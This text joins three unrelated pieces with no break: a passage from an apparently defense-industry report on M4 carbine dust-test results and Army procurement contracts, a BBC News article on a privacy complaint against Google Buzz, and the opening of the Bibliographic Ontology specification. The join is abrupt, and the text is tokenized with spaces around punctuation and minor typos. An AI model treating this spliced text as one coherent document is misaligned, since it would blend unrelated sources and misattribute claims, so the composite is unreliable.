The PM expects to release an RFP soon to compete the upgrade program .
Additionally , the Army will conduct a full and open competition to address a new requirement for an individual carbine .
Once the Joint Requirements Oversight Council approves the new requirement , the PM will initiate the competition with the release of an RFP for comments from industry .
This is the first step in conducting the competition .
The Army is working with the other Services in these programs to ensure their requirements are included in our process and they are always invited to participate in the programs ’ development and production . ”
Jan 12/10 : HK .
Heckler & Kock announces that they will begin producing civilian variants of the HK416 and the 7.62 mm HK417 in a new HK manufacturing facility in Newington , New Hampshire .
It ’s co-located within an existing 70,000 square foot facility , and would create an American manufacturing base from which to offer military HK416s as well .
EVP Wayne Weber of Heckler & Koch USA :
“ It is our intention for all U.S. made HK products to equal the quality and reliability of the products made in Germany …
By establishing American - based manufacturing , we can compliment our German production and ensure that HK can be more competitive in the U.S. and comply with government contracts requiring U.S. manufacturing .
HK products made in the USA will be fully compliant with federal solicitations giving preference to domestically produced products . ”
USMC M240B ,
Afghanistan
( click to view full ) Nov 30/09 : Report .
US Army TRADOC releases a paper by Major Thomas P. Ehrhart of the Command and General Staff College titled “ Increasing Small Arms Lethality in Afghanistan : Taking Back the Infantry Half - Kilometer ” [ PDF ] .
It points out that American forces are routinely engaged in Afghan firefights beyond 300 meters , where their weapons are less effective than their opponents .
Excerpts : “ Comments from returning non-commissioned officers and officers reveal that about [ 50 % ] of engagements occur past 300 meters .
The enemy tactics are to engage United States forces from high ground with medium and heavy weapons , often including mortars , knowing that we are restricted by our equipment limitations and the inability of our overburdened soldiers to maneuver at elevations exceeding 6000 feet .
Current equipment , training , and doctrine are optimized for engagements under 300 meters and on level terrain .
There are several ways to extend the lethality of the infantry .
A more effective 5.56 - mm bullet can be designed which provides enhanced terminal performance out to 500 meters .
A better option to increase incapacitation is to adopt a larger caliber cartridge , which will function using components of the M16 / M4 .
The 2006 study by the Joint Service Wound Ballistics – Integrated Product Team discovered that the ideal caliber seems to be between 6.5 and 7 - mm .
This was also the general conclusion of all military ballistics studies since the end of World War I .
The reorganization of the infantry squad in 1960 eliminated the M1D sniper rifle and resulted in the loss of the precision mid-range capability of the infantry squad …
All 5.56 - mm weapons are most effective when employed within 200 meters due to velocity limitations .
Once contact is made , the fight is limited to machine gunners , mortars and designated marksmen .
In the table of organization for a light infantry company8 only the six - M240B 7.62 - mm machine guns , two - 60 - mm mortars and nine designated marksman armed with either 7.62 - mm M14 rifles or accurized 5.56 - mm M16A4 ’s rifles are able to effectively engage the enemy .
These weapons systems represent 19 percent of the company ’s firepower .
This means that 81 percent of the company has little effect on the fight .
This is unacceptable . ”
Reclaiming the Infantry Half - Kilometer
Oct 12/09 : Field .
The Associated Press reports that M4 carbine and M249 SAW light machine gun failures contributed to the debacle at Wanat , Afghanistan , in which an American outpost was overrun by the Taliban , and to another situation at nearby Kamdesh .
An excerpt : “ [ Douglas Cubbison of the Army Combat Studies Institute at Fort Leavenworth , KS ] study is based on an earlier Army investigation and interviews with Soldiers who survived the attack at Wanat …
The Soldiers said their weapons were meticulously cared for and routinely inspected by commanders .
But still the weapons had breakdowns …
Cubbison acknowledges the high rates of fire during the two - hour battle may have led to the failures .
But he says numerous problems occurred relatively early in the engagement . ”
Defense
Tech adds that : “ Basically , the most damning conclusions are compiled in the recommendations section of the report .
There are a few instanced specified in the report of an M4 fouling , and one where the M4 fouled and the Soldier picked up a SAW and that was jammed up as well …
Staff Sergeant Phillips poured out fire , as recalled by another Engineer Specialist loading for him , [ SSG Phillips ] went through three rifles using them until they jammed . ”
Debacle at Wanat
FY 2007 – 2008 Army holds test – M4 last by far .
M4 , EDT -III
( click to view full )
Sept 17/08 : Competition .
Military.com ’s Christian Lowe reports that that the Army issued a solicitation to industry in August 2008 , asking companies to submit proposals that would demonstrate “ … improvements in individual weapon performance in the areas of accuracy and dispersion … reliability and durability in all environments , modularity and terminal performance . ”
The intervening years have seen a number of new carbine designs hit the market , as well as a number of “ personal defense weapons ” that attempt to deliver carbine - class firepower in a weapon only slightly larger than a pistol .
Most use calibers other than 5.56 mm or 9 mm , however , which has prevented their adoption for use by pilots , vehicle crew , and other specialists who need an extremely compact weapon .
The Army solicitation also asks for ideas on a “ subcompact ” variant that would fit in this category .
The article quoted Richard Audette , project manager for Soldier weapons at the US Army ’s Picatinny Arsenal .
The Army is currently working on its carbine requirements document , and is trying to write it in a way that does not exclude other calibers :
“ We ’re at the point now where we ’re going to go out and compete …
We ’re looking for anyone that has a world - class carbine …
We ’re interested in any new technologies out there …
We want to know about everything that ’s out there , regardless of caliber …
If you ’ve got a 6.8 [ mm caliber weapon ] , we ’re interested in that and seeing what that brings to the table . ”
What the Army will insist upon , however , is production capacity .
Colt can churn out 10,000 M4s per month , and in June 2009 the M4s blueprints will no longer be a Colt exclusive .
Experience with ongoing M16 orders suggests that this will expand production capacity , and drive down prices .
In contrast , manufacturers of weapons in promising new calibers like 6.8 mm have not received large military orders to ramp up their production capacity to the same levels .
Producibility is certainly a valid concern .
It must be part of any fair and reasonable competition .
It can also be abused to become a back door method of ratifying existing decisions , while adopting the veneer of competition .
Which will it be in this case ?
Only time will tell .
July 11/08 : Demonstration .
Military.com reports that about 30 legislative aides signed up to attend a July 11 demonstration at Marine Corps Base Quantico .
Congressional and industry sources report that the event feature the standard 5.56 mm M4 carbine , plus the FN SCAR Mk17 7.62 mm ( SCAR MK16 is the 5.56 mm version that was tested by the Army ) , – and a modified “ M4 - style MURG ( Modified Upper Receiver Group ) ” rifle capable of firing a new 6.8 mm special purpose cartridge round , among others .
Attendees included FN - USA , HK , LWRC who offers receiver group switchouts like HK’s and adds a 6.8 mm version , Barrett ( REC - 7 6.8 mm ) , and Bushmaster .
All reportedly avoided commercial sales pitches , and stuck to facts and demonstrations .
Complaints persist from troops on the front lines regarding the current 5.56 mm round / riling combination ’s lethality .
The ballistic characteristics of calibers around 6.8 mm have yet to feature a breakthrough military purchase in the face of 5.56 mm standardization , but these calibers are gaining growing recognition for their balance of size ( can be used with M16 magazines ) , light weight , and knock - down power .
Participants reportedly had the opportunity to observe the effects of different caliber rounds in translucent ballistic jelly , which simulates human tissue , and to fire the weapons involved .
Sens. James Coburn [ R - OK ] and Ken Salazar [ D - CO ] remain very active in this area , but the number of participants suggests that their efforts may be gaining traction in spite the Army .
Military.com | American Mohist .
Late December 2007 : Test results .
DID obtains some exact results from the Army ’s testing .
The Army has now done 3 dust tests .
In the late 2006 / Jan 2007 report “ Baseline Reliability and Dust Assessment for the M4 , M16 , and M249 , ” the M4 jammed 9,836 times – 1 jam every 6 rounds .
In a May 2007 “ Extreme Dust Test II ” , with no competitors , the M4 had 1 jam every 88 rounds , using heavy lubrication .
In the November 2007 “ Extreme Dust Test III ” , as DID has discussed , the competing rifles were subject to significantly more maintenance and lubrication than elite American forces like Delta used in their weapon selection process , or indeed in HK ’s own field testing of its HK416s prior to shipment .
We ’ll begin with the Army ’s overall results , from its own release : “ Even with extreme dust test III ’s 98.6 percent success rate there was a total of 863 class 1 and 2 weapon / magazine stoppages with 19 class 3 stoppages .
During extreme dust test II conducted during the summer , there were 296 total class 1 and 2 stoppages and 11 class 3 stoppages .
A class 1 stoppage is one a Soldier can clear within 10 seconds ; a class 2 stoppage is one a Soldier can clear , but requires more than 10 seconds ; and , class 3 is a stoppage that requires an armorer to clear . ”
DID will simply point out that 10 seconds can be a rather fatally long time when people are shooting at you , and at your friends .
So , what happens when the Extreme Dust Test III stoppages are broken out by weapon ?
The M4 Carbine is the Army ’s existing weapon .
882 jams , 1 jam every 68 rounds , again using heavy lubrication .
In addition all 10 of the M4 barrels needed to be replaced , and a number of their parts were replaced during the test .
None of the cold hammer forged HK416 and XM - 8 barrels needed replacement .
The HK416 is a modified M4 carbine , which can be and has been converted from existing rifles .
Used by US Special Forces .
233 jams , 1 jam every 257 rounds , 3.77 x more reliable than the M4 .
FN SCAR is US special Forces ’ new weapon , designed by SOSOCM .
It just went into production in late 2007 .
226 jams , 1 jam every 265 rounds , 3.85 x more reliable than the M4 XM - 8 is a developmental rifle .
It ’s an advanced version of HK ’s G36 , a rifle in wide use by many NATO armies .
The US Army cancelled the XM - 8 weapons family 2 years ago .
127 jams , I jam every 472 rounds , 6.95 x more reliable than the M4 .
The failure of M4 barrels at 6,000 rounds confirms SOCOM objections that date back to the Feb 23/01 report “ M4A1 5.56 mm Carbine and Related Systems Deficiencies and Solutions , ” which ended up concluding that “ M4A1 Carbine … does not meet the requirements of SOF . ”
The barrel replacement also increases the rifle ’s life cycle costs when compared with the 10,000 round advertised barrel life , as additional barrels are sold to the Army for $ 240 each .
A longer , heavier M16 barrel , which is a competed production weapon , cost $ 100 by comparison .
While the dust test is indeed an extreme test , the 10,000 round requirement is under “ all conditions ” – not just ideal conditions .
Dec 18/07 : The US Army publishes “ M - 4 Carbine Has High Soldier Confidence Despite Test . ”
Not exactly a headline to inspire confidence , as the Army acknowledges that the M4 Carbine finished last among the 4 contenders – but amazingly , asserts that the rifle is just fine and shows no interest in buying even the HK416 ’s parts swap - out into the existing M4 : “ After being exposed to the heavy dusting , 10 of each weapon fired 6,000 rounds apiece .
They were fired in 50 120 - round cycles .
Each was then wiped and re-lubricated at the 600 round mark .
After 1,200 rounds were fired from each weapon , they were fully cleaned and re-lubricated …
“ While the M - 4 finished fourth out of four , 98 percent of all the rounds fired from it went off down range as they were supposed to do , ” Brig .
Gen . [ Mark ] Brown [ commander of Program Executive Office Soldier and the Natick Soldier Systems Center ] said .
“ However , the three other candidates did perform better at about a 99 percent rate or better , which is a mathematically statistically significant difference , but not an operationally statistical difference . ” …
The Army has put an option on an existing contract for 64,450 M4s , according to the general . ”
“ A mathematically statistically significant difference , but not an operationally statistical difference . ”
Statistically , 99 % is a 100 % improvement over 98 % .
Operationally , I jam every 68 rounds is almost one jam for every 2 30 - round magazines .
Whereas one jam in 257 rounds would only happen about once in 8 30 - round magazines .
Readers are left to contemplate the operational significance of those probabilities in a sustained , serious firefight .
4 - Rifle test : M4 finishes dead last
June 29/07 : Testing .
A document circulated on Capitol Hill asking for testing includes these excerpts :
“ The Army has claimed “ 83 % reported confidence that the M4 will not suffer major breakage or failure that necessitates repair before further use ” – A soldier should be 100 % confident that his weapon will not break the next time he fires it …
Since the M16 was introduced in Vietnam the answer has always been “ It ’s the soldiers ’ fault ” …
The Special Operations Command has the most proficient soldiers in the world , they shoot the most and they operate in the most difficult environments –
In 2001 SOCOM was highly critical of the reliability of the M4 , and they chose to adopt a new weapon – the SCAR .
Our Tier 1 units – like Delta Force , and Seal Team 6 have all abandoned the M4 for other weapons that is [ sic ] significantly more reliable . ”
M4 Carbine Contracts Announced to Date
M4 carbine , firing
( click to view full )
The following contracts concern the M4 Carbine and its variants directly ; other than spare parts or magazines , all other related contracts for accessories etc. were excluded .
We also excluded M16 contracts that did not also include M4s .
No announced DefenseLINK contracts have fit these criteria since February 2009 , though some sole - source orders may be found in other venues .
The FBO.gov June 14/11 presolicitation may lead to additional announced orders .
March 6/14 : US Army Contracting Command at Picatinny Arsenal , NJ awards $ 16.3 million in contracts as a firm - fixed - price , multi - year contract for M4 rifle bolts under the M4 product improvement program .
Each request will be competed between Colt Defense LLC in West Hartford , CT ( W15QKN - 14- D-0027 ) and FN Manufacturing LLC in Columbia , SC ( W15QKN - 14 - D-0026 ) , though 6 bids were received .
The contract runs until Feb 28/18 .
Jan 7/13 : Colt Defense LLC in West Hartford , CT receives $ 14 million firm - fixed - price contract for the M4 Product Improvement Program replacement barrel and front sight assembly .
Work location will be determined with each order , with an estimated completion date of Dec 30 / 16 .
The bid was solicited through the Internet , with 6 bids received by the US Army Contracting Command in Warren , MI ( W56HZV - 13-D-0040 ) .
Dec 19 /12 : From FBO.gov , amended solicitation # W15QKN - 13 - R-0039 , originally issued Nov 27/12 :
“ … requirement for up to a total of 350,000 Replacement Bolts used in the conversion of the M4 Carbine to the M4A1 Carbine .
To meet continuous requirements for FY13 through FY17 , the United States Government intends to award one or more four - year IDIQ contracts with Firm Fixed Price ( FFP ) orders based on Other Than Full and Open competition …
Competition for this requirement shall be other than full and open , and limited to the United States and its territories , island possessions and protectorates , in accordance with the license agreement between the US Government and Colt Defense LLC , limiting distribution of the Technical Data Package ( TDP ) .
The authority to limit competition is in accordance with 10 U.S.C. 2304 ( c ) ( 1 ) , as implemented by FAR 6.302 - 1( a ) ( 2 ) ( ii ) ( A ) , only one responsible source and no other supplies or services will satisfy agency requirements .
FAR 6.302 - 1( a ) ( 2 ) applies when supplies or services required by the agency are available from only one responsible source , or for DoD , NASA and the Coast Guard , from only one or a limited number of responsible sources , and no other type of supplies or services will satisfy agency requirements .
The maximum contract ceiling price for the total anticipated contract award is $ 21,350,000.00 .
The maximum quantity of units is
350,000 .
The anticipated award date for this action is 3rd Quarter of Fiscal Year 2013 . ”
Nov 16 / 12 : The GAO dismisses Colt ’s protest .
Oct 9/12 : Colt protests again .
For the 2nd time in 5 months , Colt lodges a protest of the US Army ’s efforts to upgrade its M4 carbines to M4A1s .
This protest is aimed at the amended Sept 21 / 12 solicitation .
Military.com .
July 24/12 : Colt Protests , Wins .
The US Government Accountability Office ’s ruling forces the US Army to rework the original M4A1 upgrade competition that Remington had won ( q.v. April 25 / 12 entry ) , so vendors in the competitive range could re-submit .
Colt protested both Remington Defense ’s win , and the miscalculation of royalties Colt would receive .
More than 6,000 soldiers in the 101st Airborne have already received the rifles , but the Army will need to resolve these protests if it wishes to begin installing conversion kits in summer 2013 .
The M4A1 includes a heavier barrel , a full automatic trigger assembly , and ambidextrous fire controls .
A free - float forward rail , which improves accuracy is widely available on civilian guns , might receive a contract by the end of 2014 .
What ’s conspicuous by its absence is a more reliable firing system .
Col. Scott Armstrong of PM Soldier Weapons :
“ There were 11 [ vendors ] that competed in that ; they went through nearly a year of testing ….
None of the offerers completed the first phase or outperformed the current bolt and bolt carrier group on the M4A1 configuration .
Areas that the competitors really fell short in were reliability , durability as well as high temperature and low temperature conditions .
The M4A1 bolt outperformed [ the competition ] in all of those areas . ”
See : GAO ruling | Military.com
April 25 / 12 : M4s from Remington .
Remington Arms Company , LLC in Ilion , NY receives an $ 83.9 million firm - fixed - price contract for 24,000 M4A1 carbines .
Remington is positioned for any future carbine competition , if there is one , with the ACR .
Meanwhile , its “ R4 ” seems to have found a production niche , now that Colt no longer owns all rights .
This is the 1st non-Colt M4 contract , and Remington beat 5 other bids – presumably including Colt .
Work will be performed in Ilion , NY until April 12/17 .
U.S. Army Contracting Command in Warren , MI manages the contract ( W56HZV -12-D-0056 ) .
Oct 5/11 : GTD , Inc. in Lola , MT , received an $ 8.6 million firm - fixed - price indefinite - delivery / indefinite - quantity contract for M4 / M4A1 Carbine Trigger Components .
Work will be performed in Lola , MT , with an estimated completion date of Sept 30 / 16 .
The bid was solicited through the Internet , with 4 bids received by the U.S. Army Contracting Command in Warren , MI ( W56HZV -11-D-0207 ) .
June 14/11 : RFP . FBO.gov releases Presolicitation W56HZV - 10 - R-0593 , covering 70,000 – 100,000 M4 and M4A1 carbines over 5 years .
The Government expects to order 25 - 30 % in each of years 1 and 2 , and 13 - 17 % in each of years 3 through 5 .
The contractor (s ) winning the best value competition will also be required to provide ancillary equipment as specified by the contract , and will be paid only for produced items , not for setup and manufacturing costs .
Bidding is restricted to firms in the U.S. & its territories , and the carbines will be produced in accordance with the M4 / M4A1 Technical Data Package ( TDP ) and the license agreement between the U.S. Government and Colt Defense , LLC .
That TDP is restricted / export controlled , and requires submission of a Non-Disclosure Agreement .
The TDPs will not be available until an NDA is submitted , and an FBO.gov solicitation is issued .
Read “ Colt M4 Data Rights & The Individual Carbine Competition ” for an analysis of how the Army reached this point , and what it could mean in practice .
Feb 2/09 : Colt Defense LLC in Hartford , CT received a $ 9.5 million firm - fixed - price 5 - year Requirements contract for 18,000 Barrel & Front Assemblies ; 13,600 Hand Guards ; 7,100 Heavy Barrel Assemblies ; 22,000 Receivers and Cartridges ; and 200,000 Extractor Spring Assemblies .
Work is to be performed at Hartford , CT with an estimated completion date of Sept 28 / 12 .
US Army Tank and Automotive Command Rock Island in Rock Island , IL manages this contract ( DAAE20 - 03 - D- 0191 ) .
April 17/07 : Small business qualifier Colt Defense LLC in Hartford , CT , was awarded on April 6 , 2007 , the full delivery order amount of $ 50.8 million as part of a firm - fixed - price contract for M4 and M4A1 carbines .
Work will be performed in Hartford , CT , and is expected to be complete by July 30 , 2008 .
This was a sole source contract initiated on Feb. 16 , 2007 by the U.S. Army Tank - Automotive and Armaments Command in Rock Island , IL ( W52H09 -04 - D-0086 ) .
See also July 26/06 .
Jan 22/07 : Small business qualifier Colt Defense LLC in Hartford , CT received a delivery order amount of $ 5.6 million as part of a $ 24.3 million firm - fixed - price contract for Unique Spare Parts for the M4 and M4A1 Carbine .
Work will be performed in Hartford , CT , and is expected to be complete by May 30 , 2008 .
This was a sole source contract initiated on April 5 , 2004 .
The U.S. Army Tank - Automotive and Armaments Command , Rock Island , Ill. , is the contracting activity ( DAAE20 - 03 - D- 0191 ) .
Sept 26/06 : Small business qualifier Colt Defense LLC in Hartford , CT received a maximum $ 10 million firm - fixed - price , indefinite - delivery / indefinite - quantity contract for M4A1 machine guns .
The M4A1 Carbine and variants will be utilized with the family of carbines that are currently in the U.S. Military arsenal .
The M4A1 Carbine will come in four basic versions , which consist of longer and shorter versions of the M4A1 Carbine .
Work will be performed in Hartford , CT , and is expected to be complete by September 2011 .
Contract funds in the amount of $ 278,300 , will expire at the end of the current fiscal year .
This contract was not competitively procured by the Naval Surface Warfare Center , Crane Division in Crane , Indiana ( N00164-06 - D-4805 ) .
July 26/06 : Small business qualifier Colt Defense LLC in Hartford , CT received a delivery - order amount of $ 53.8 million as part of a $ 242.5 million firm - fixed - price contract for procurement of M4 / M4A1 carbines .
Work will be performed at Hartford , CT , and is expected to be complete by Sept. 30 , 2007 .
This was a sole source contract initiated on June 30 , 2006 .
The Army Tank - Automotive and Armaments Command , Rock Island , Ill. , is the contracting activity ( W52H09 - 04 - D-0086 ) .
Jan 13/06 : Small business qualifier Center Industries Inc. in Wichita , KS received a $ 7,712,600 modification to a firm - fixed - price contract for aluminum magazines for the M16 rifle / M4 carbine .
Work will be performed in Wichita , KS and is expected to be complete by Oct. 31 , 2007 .
This was a sole source contract initiated on Dec. 30 , 2005 by the U.S. Army Tank - Automotive and Armaments Command in Rock Island , IL ( DAAE20 - 02 - F- 0022 ) .
April 1/05 : FN Manufacturing Inc. in Columbia , SC received a delivery order amount of $ 6.7 million as part of a $ 29.8 million firm - fixed - price contract for M16A4 rifle and M4 carbine .
Work will be performed in Columbia , SC , and is expected to be complete by Dec. 31 , 2008 .
There were 2 bids solicited on Dec. 20 , 2004 , and 2 bids were received by the U.S. Army Tank - Automotive and Armaments Command in Rock Island , IL ( W52H09 - 05 - D-0080 ) .
FN Manufacturing LLC writes in to say that they have won “ the vast majority of M16A2 , A3 and A4 contracts as well as spare parts contracts for these systems since 1989 ” through “ full and open competition . ”
Having said that : “ … never was FN Manufacturing LLC , or any other small arms manufacturer , awarded M4 contracts .
The M4 cannot be competed and always has been awarded sole source to Colt because of licensing rights restricting full and open competition until 2009 . ”
Aug 30 /04 : Small business qualifier Colt Defense LLC in Hartford , CT received a delivery order amount of $ 0 as part of a $ 123 million firm - fixed - price contract for 124,803 weapons in either M4 carbine or M4A1 carbine configurations .
Work will be performed in West Hartford , CT , and is expected to be complete by Sept. 30 , 2007 .
This was a sole source contract initiated on Oct. 14 , 2003 by the U.S. Army Tank - Automotive and Armaments Command in Rock Island , IL ( W52H09 -04 - D-0086 ) .
Jan 15/04 : Small business qualifier Colt Defense LLC in Hartford , CT received Jan. 13 , 2004 , a delivery order amount of $ 4,029,095 as part of an $ 8,058,190 firm - fixed - price contract for M4 unique spare and repair parts .
Work will be performed in Hartford , CT , and is expected to be complete by Jan. 30 , 2009 .
This was a sole source contract initiated on Sept. 18 , 2003 by the U.S. Army Tank - Automotive and Armaments Command in Rock Island , IL ( DAAE20 - 03 - D- 0191 ) .
July 31/02 : Colt ’s Manufacturing Company Inc. in Hartford , CT received an $ 18.5 million undefinitized contracting action for 25,764 M4 carbines and 300 M4A1 carbines , in support of the U. S. Air Force , U. S. Army , and foreign military sales countries on July 30 , 2002 .
Work will be performed in West Hartford , CT , and is to be complete by Sep. 30 , 2004 .
This was a sole source contract initiated on June 6 , 2002 by the U.S. Army Tank and Automotive Command in Rock Island , IL ( DAAE20 - 02 - C-0115 ) .
Sept 19/96 : Small business qualifier Colt ’s Manufacturing Company Inc. in Hartford , CT received a $ 5.5 million firm fixed price contract , with a potential value of $.5 million if all options are exercised , for 9,861 M4 Carbines , 5.56 mm and 716 M4A1 Carbines .
Work will be performed in Hartford , CT and is expected to be complete by April 30 , 1998 .
This is a sole source contract initiated on September 6 , 1996 by the U.S. Army Tank - Automotive & Armaments Command in Rock Island , IL ( DAAE20 - 96 - C-0391 ) .
Appendix A : Testing , Testing – Fairly ?
XM - 8 Family
( click to view full )
The promised tests included the M4 and 3 other rifles : the M4 - based HK416 , the FNH USA - designed Mk16 SOCOM Combat Assault Rifle ( best known as FN SCAR- L ) , and the H&K XM8 carbine .
Unlike the M4 , the HK416 , XM8 , and FN - SCAR all use gas - piston operating systems to achieve automatic fire .
The XM8 family is an very updated version of the popular G36 in use with many NATO militaries ; it was slated to be the M4 ’s replacement , but that RFP was suspended by the Army in July 2005 and then canceled in October 2005 .
The FN - SCAR is a “ live ” program , and July 2007 marked the beginning of Special Operations Command ’s operational tests of the FN - SCAR 5.56 mm Mk16 and the 7.62 mm Mk17 , which could become its future mainstays .
Miltary.com reported that the US Army sand tests will include 10 samples of each weapon through which engineers will fire 6,000 rounds .
Each weapon and loaded magazine will be exposed to “ extreme dust ” for 30 minutes then test fired with 120 rounds .
Each weapon will be wiped down and lubricated every 600 rounds , with a full cleaning every 1,200 rounds .
The firing , collection of data and analysis of data is expected to take approximately 5 months .
( click to view full ) FN SCAR w. Grip Pod ( click to view full )
One ’s first reaction upon seeing the proposed testing regimen was to compare it very unfavorably with the regimen Delta Force put the HK416 through , firing it day after day without maintenance for thousands of rounds .
Or even the testing HK itself uses for its HK416s .
Indeed , it seems on its face to be a test designed to minimize the very weaknesses in the M4 incumbent that have triggered this controversy .
Those who believe the cycle is reasonable cite 300 rounds as the soldier ’s 1 - day load , and say that under sand storm conditions , a once a day wipedown is the bare minimum for any weapon .
Every 600 rounds is thus a safety factor of 2 against the worst possible conditions .
Of course , sandstorms have a way of lasting more than one day , and when they do – as in the initial portion of Operation Iraqi Freedom – even vehicle interiors may feature a fine particulate haze .
Within its chosen regimen , there were 3 key ways the Army could choose to bias the test .
One was the size of the particulate in the dust chamber – which can be made large in relative terms to lower the number of problems with fouling and jams .
The biggest problems in theater are with the very fine particulates .
This is especially relevant given the October 2004 report prepared by the Desert Research Institute for the US military .
“ Geochemical and Physical Characteristics of Iraqi Dust and Soil Samples ” [ PDF , 2.9 MB ] stated that :
“ … current chamber test methodology misrepresents real - world conditions .
The character of the soils and dust collected from areas of military activity in Iraq is greatly different from the material used in current weapons testing procedures .
Current procedures employ laboratory generated dust that is 99.7 % silicon dioxide ( i.e. quartz ) , contains no salt or reactive chemicals , and contains coarser particle sizes than most of the Iraq samples .
Use of this material cannot simulate conditions in Iraq that have contributed to the weapons failures . ”
The next item to watch was whether the rifles used were randomly chosen , or cherry picked and then pre-maintained to perform at an unusual reliability level vs. a field weapon .
A third way of gaming the testing system could involve the level of lubrication used .
One source noted that the first dust test new M4s had 9,836 jams in 60,000 rounds – almost one jam every 6 rounds .
The Army kept working on the test until they figured out a “ generous lubrication ” approach that used far more than the manufacturer recommended , but lowered jams to 1 in 88 rounds .
A fair test must match the manufacturer ’s manual for each weapon , or use the same lubrication for each weapon based on the minimum recommended among all test weapons .
Additional Readings
Background : Weapons & Key Trends
News & Views
By Maggie Shiels
Technology reporter , BBC News , Silicon Valley
Buzz integrates directly with Google 's Gmail service A leading privacy group has urged US regulators to investigate Google 's new social networking service Buzz , one week after its launch .
The Electronic Privacy Information Centre ( Epic ) has made its complaint to the US Federal Trade Commission ( FTC )
It says that Buzz - which is part of Google 's Gmail service - is " deceptive " and breaks consumer protection law .
The search giant has twice made changes to the service to placate an outcry from users about privacy concerns .
Canadian officials are also looking at whether Buzz violates privacy laws .
" Google still has n't gone far enough , " Epic 's consumer privacy counsel Kim Nguyen told BBC News .
" Twitter is a social networking site and people know what they are signing up for .
With Gmail , users signed up for an e-mail service not a social networking service , " said Ms Nguyen .
" Despite all the changes , they still do not give users a meaningful way to opt into it . "
Buzz was automatically rolled out to Gmail 's 176 million users .
The FTC has been asked to " require Google to provide Gmail users with opt - in consent to the Google Buzz service " .
The complaint has also asked the FTC to " require Google to provide notice to and request consent from Gmail users before making material changes to their privacy policy in future , and seek appropriate injunctive and compensatory relief " .
' Rightfully upset '
Since launching Google Buzz as part of Gmail last week , the search giant has faced a torrent of criticism regarding privacy .
The feature that attracted the biggest outcry was one which automatically gave users a ready - made circle of friends to follow based on the people they emailed the most .
The site 's " auto follow " feature raised privacy concerns Privacy advocates said that meant the list of contacts was open for all to see and could have had serious implications for journalists , businesses or even those conducting illicit affairs .
Engineers have now replaced the auto - follow feature with one that suggests who to follow but EPIC said that still leaves the " user with the burden to block those unwanted followers " .
The organisation also wants the company barred from using Gmail address book contacts to make up social networking lists .
Google has apologised and said it acted quickly to address concerns including introducing a new option to disable the service .
" If it becomes clear that people do n't think we 've done enough , we 'll make more changes , " Todd Jackson , product manager for Google Buzz told BBC News .
He acknowledged that many of Gmail 's " tens of millions " of users were " rightfully upset " and that the firm was " very , very sorry " .
' Seek forgiveness '
The botched launch of Buzz has led many to ponder how and why it happened .
In an interview with BBC News , Mr Jackson admitted that testing of the service had been inadequate and that it was not opened up to a big enough group of people to try out .
" We 've been testing Buzz internally at Google for a while .
Of course , getting feedback from 20,000 Googlers is n't quite the same as letting Gmail users play with Buzz in the wild . "
The Consumer Watchdog , an advocacy group , said it was not surprised by this stumble .
" This case illustrates a lot about Google 's corporate culture where a company is run by computer scientists whose operating method is do n't ask for permission when you can always ask for forgiveness , " said the organisation 's John Simpson .
The move by EPIC to ask the FTC to investigate Buzz mirrors one it made in December against the world 's biggest social networking platform Facebook .
Then , the privacy watchdog was not happy about changes the company made to its privacy settings .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Specification Document - 4 November 2009
Copyright © 2008 - 2013 by Structured Dynamics LLC .
This work is licensed under a Creative Commons License .
This copyright applies to the Bibliographic Ontology Specification and accompanying documentation and does not apply to Bibliographic Ontology data formats , ontology terms , or technology .
Regarding underlying technology , Bibliographic Ontology relies heavily on W3C's RDF technology , an open Web standard that can be freely used by anyone .
Abstract The Bibliographic Ontology Specification provides main concepts and properties for describing citations and bibliographic references ( i.e. quotes , books , articles , etc ) on the Semantic Web .
Status of This Document
NOTE : This section describes the status of this document at the time of its publication .
Other documents may supersede this document .
This specification is an evolving document .
This document is generated by a machine - readable Bibliographic Ontology expressed in RDF / XML with a specification template .
Authors welcome suggestions on the Bibliographic Ontology and this document .
This document may be updated or added to based on implementation experience , but no commitment is made by the authors regarding future updates .
Table of Contents
Introduction
The Bibliographic Ontology describe bibliographic things on the semantic Web in RDF .
This ontology can be used as a citation ontology , as a document classification ontology , or simply as a way to describe any kind of document in RDF .
It has been inspired by many existing document description metadata formats , and can be used as a common ground for converting other bibliographic data sources .
Terminology and Notation
Namespace URIs of the general form " http://www.example.com/. " represents some application - dependent or context - dependent URI as defined in RFC 2396 [ RFC 2396 ] .
The XML Namespace URI that MUST be used by implementations of this specification is :
http://purl.org/ontology/bibo/
Background
The Bibliographic Ontology is an effort of Frédércick Giasson and Bruce D'Arcus to express citations and bibliographic relations using RDF and to query that same information using the SPARQL query language for RDF .
The specific contents of the Bibliographic Ontology are detailed in the Bibliographic Ontology namespace document .
The Bibliographic Ontology Description
This specification serves as the Bibliographic Ontology " namespace document " .
As such it describes the Bibliographic Ontology and the terms ( RDF classes and properties ) that constitute it , so that Semantic Web applications can use those terms in a variety of RDF - compatible document formats and applications .
This document presents the Bibliographic Ontology as a Semantic Web vocabulary or Ontology .
The Bibliographic Ontology is straightforward , pragmatic and designed to allow simultaneous deployment and extension , and is therefore intended for widescale use .
Evolution and Extension of the Bibliographic Ontology
The Bibliographic Ontology is identified by the namespace URI ' http://purl.org/ontology/bibo/'.
Revisions and extensions of Bibliographic Ontology are conducted through edits to the namespace document , which by convention is published in the Web at the namespace URI .
The properties and types defined here provide some basic concepts for use in Bibliographic Ontology descriptions .
Other vocabularies ( e.g. the Dublin Core metadata elements for simple bibliographic description , FOAF , etc. ) can also be mixed in with the Bibliographic Ontology terms , as can local extensions .
The Bibliographic Ontology is designed to be extended , and modules may be added at a later date .
Bibliographic Ontology Modules
Bibliographic
Ontology modules may be used to extend the ontology and avoid making the base ontology too complex .
The Bibliographic Ontology and Standards
It is important to understand that the Bibliographic Ontology as specified in this document is not a standard in the sense of ISO Standardisation , or that associated with W3C Process .
The Bibliographic Ontology depends heavily on W3 C 's standards work , specifically on XML , XML Namespaces , RDF , and OWL .
All the Bibliographic Ontology documents must be well - formed RDF / XML documents .
This specification contributes an ontology , the " Bibliographic Ontology " , to the Semantic Web , specifying it using W3 C's Resource Description Framework ( RDF ) .
As such , the Bibliographic Ontology adopts by reference both a syntax ( using XML ) , a data model ( RDF graphs ) and a mathematically grounded definition for the rules that underpin the RDF design .
The Bibliographic Ontology and RDF
Why does the Bibliographic Ontology use RDF ?
The Bibliographic Ontology is an application of the Resource Description Framework ( RDF ) because the subject area we 're describing – citations and bibliographic references -- has so many competing requirements that a standalone format would not capture them or would lead to trying to describe these requirements in a number of incompatible formats .
